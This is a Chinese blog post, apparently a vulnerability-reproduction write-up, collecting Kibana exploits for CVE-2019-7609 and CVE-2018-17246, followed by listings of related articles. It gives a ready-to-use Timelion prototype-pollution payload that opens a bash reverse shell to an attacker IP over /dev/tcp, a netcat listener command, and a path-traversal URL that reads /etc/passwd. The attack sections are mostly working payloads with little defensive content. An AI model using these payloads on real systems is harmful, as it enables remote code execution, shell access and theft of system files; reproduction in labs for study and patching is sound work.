kibana 漏洞收集总结

最新推荐文章于 2025-05-08 10:10:13 发布
最新推荐文章于 2025-05-08 10:10:13 发布
阅读量7.9k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sojrs_sec/article/details/103781497
本文详细解析了Kibana中的两个严重安全漏洞:CVE-2019-7609远程代码执行漏洞和CVE-2018-17246文件包含漏洞。CVE-2019-7609允许攻击者通过Timelion模块执行任意代码,而CVE-2018-17246则可通过特定路径读取系统文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一:cve-2019-7609 命令执行

Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell
访问

http://ip:5601/app/timelion

输入payload

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ’)

在这里插入图片描述
攻击机起监听

Nc -lvnp 12345

参考:https://github.com/mpgn/CVE-2019-7609
http://blog.leanote.com/post/snowming/2cd6256df61d

二:cve-2018-17246 文件包含

kibana version < 6.4.3
kibana version < 5.6.13

http://ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

将在文件后台查看到密码日志
参考:https://github.com/zhengjim/loophole/tree/master/CVE-2018-17246

Kibana未授权访问漏洞记录(CVE-2019-7609,Kibana的RCE,原型链污染,端口:5601)
墨痕诉清风的博客
11-12 5469
漏洞描述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。 漏洞复现 环境启动后,访问 http://your-ip:5601 即可看到Kibana页面。 原型链污染发生在“Timeline”页面,我们填入如下Payload: 创建文件 .es(*).props(label.__proto__.env.AAAA='require("chil
Kibana远程代码执行漏洞攻击方法和漏洞原理分析
HBohan的博客
07-04 1723
漏洞简介 Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell。 环境搭建 领取相关学习资料 靶机环境: Parrot Security OS 4.7 64位 或其他类Linux操作系统(VMWare 14) Elasticsearch6.5.4 Kibana 6.5.4 IP:10.10.10.128 攻击机环境: Windows 10 Home 64.
CVE-2025-25014(CVSS 9.1):Kibana原型污染漏洞可导致远程代码执行
最新发布
FreeBuf_的博客
05-08 368
Kibana原型污染漏洞(CVE-2025-25014)可致RCE,速升级!
Kibana任意文件包含漏洞(CVE-2018-17246)
EC_Carrot的博客
07-07 975
漏洞详细 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件,就能够包含该文件来执行代码。 漏洞复现 首先在靶机内创个代码文件,以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc
Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
EnerY3的博客
12-12 1178
CVE-2019-7609 是一个存在于 Kibana 5.6.15 到 6.6.1 版本中的远程代码执行漏洞,它允许攻击者通过原型链污染(Prototype Pollution)在目标服务器上执行任意 JavaScript 代码。这个漏洞是由于 Timelion 组件中的安全问题导致的。
漏洞预警:Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)
yuanlirong22的专栏
03-07 564
Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)。允许攻击者操纵应用程序的JavaScript对象和属性,可能导致未经授权的数据访问、权限提升、拒绝服务或远程代码执行。在Kibana 8.15.0和8.17.1之间的版本中,该漏洞仅可由具有查看者角色的用户利用。在Kibana版本8.17.1和8.17.2中,它只能被具有fleet-all或integrations-all或actions:execute-advanced-connectors权限的用户利用。
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
weixin_33726318的博客
01-02 587
不久前Elasticsearch发布了最新安全公告, Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件存在严重的本地文件包含漏洞可导致拒绝服务攻击、任意文件读取攻击、配合第三方应用反弹SHELL攻击,下文笔者对其漏洞背景、攻击原理和行为进行分析和复现。 0X01 影响范围 Elasticsearch Kibana是荷兰Elasticsea...
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1551
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
Kibana 7.13.4 安装包下载指南
总结:Kibana 7.13.4作为Elastic Stack中的可视化组件,它的安装和使用需要与其他组件如Elasticsearch紧密配合。通过下载相应的安装包并按照官方指南进行安装,用户可以构建起一个强大的数据分析平台。需要注意的是...
免费方案:Kibana 监控 windows server 服务器系统资源,内网穿透
joe45的博客
09-07 3175
kibana 监控服务器 目录预览 1、需求说明 1.1 工具选择 2、metricbeat工具介绍 3、安装部署 3.1 下载 3.2 配置 3.3 安装 3.4 启动 4、验证 5、性能 6、维护 7、Troubleshooting 一, 需求说明 1.1 监控需求 随着公司平台和外网项目的更多使用,针对项目的云平台部署运用、...
基于Cloud Kernel龙蜥操作系统,并对其进行自动化缺陷检测、漏洞挖掘和修复,以提升其安全性和可靠性
11-15
总结来说,通过结合静态与动态分析、漏洞扫描、安全审计等方法,我们可以对Cloud Kernel龙蜥操作系统进行全面的安全保障。同时,利用自动化修复工具和持续监控机制,可以显著提高系统的安全性和可靠性。在实际操作中...
多维安全漏洞治理.pdf
08-30
总结来说,多维安全漏洞治理是一种综合性的安全管理方法,通过集成化、自动化的工具和技术,实现了从资产识别到威胁响应的全流程管理。它不仅解决了当前安全管理的痛点,也为未来的网络安全防护提供了有力保障。随着...
Kibana未授权访问漏洞
lhdbk______的博客
08-05 870
Kibana未授权访问漏洞
【严重】Kibana 8.7.0 任意代码执行漏洞
murphysec的博客
05-23 1450
Kibana是用于Elasticsearch的数据可视化仪表板。Kibana在8.7.0版本引入了Synthetic监控功能,用户可配置编写playwright中的javascript代码实现web应用监控。 具备Kibana登录权限的攻击者可利用此功能编写恶意playwright脚本, 从而在Kibana主机中执行任意系统命令。
kibana漏洞复现
Shanfenglan's blog
11-30 2627
文章目录1. kibana是什么2. CVE-2018-17246 文件包含漏洞2.1 利用3. Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)3.1 利用 1. kibana是什么 一般与Elasticsearch一起工作,作用是将Elasticsearch中的数据可视化的表现出来并与之进行交互。它本身是一个web应用,可以通过5601端口去访问。 2. CVE-2018-17246 文件包含漏洞 影响版本: 5.6.13到6.4.3 2.1 利用 通常情况下Kibana
Kibana本地文件包含漏洞(CVE-2018-17246)复现
玄道的网安博客
03-09 2609
漏洞概述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。 影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 环境搭建 这里使用docker进行安装 https://github.c...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值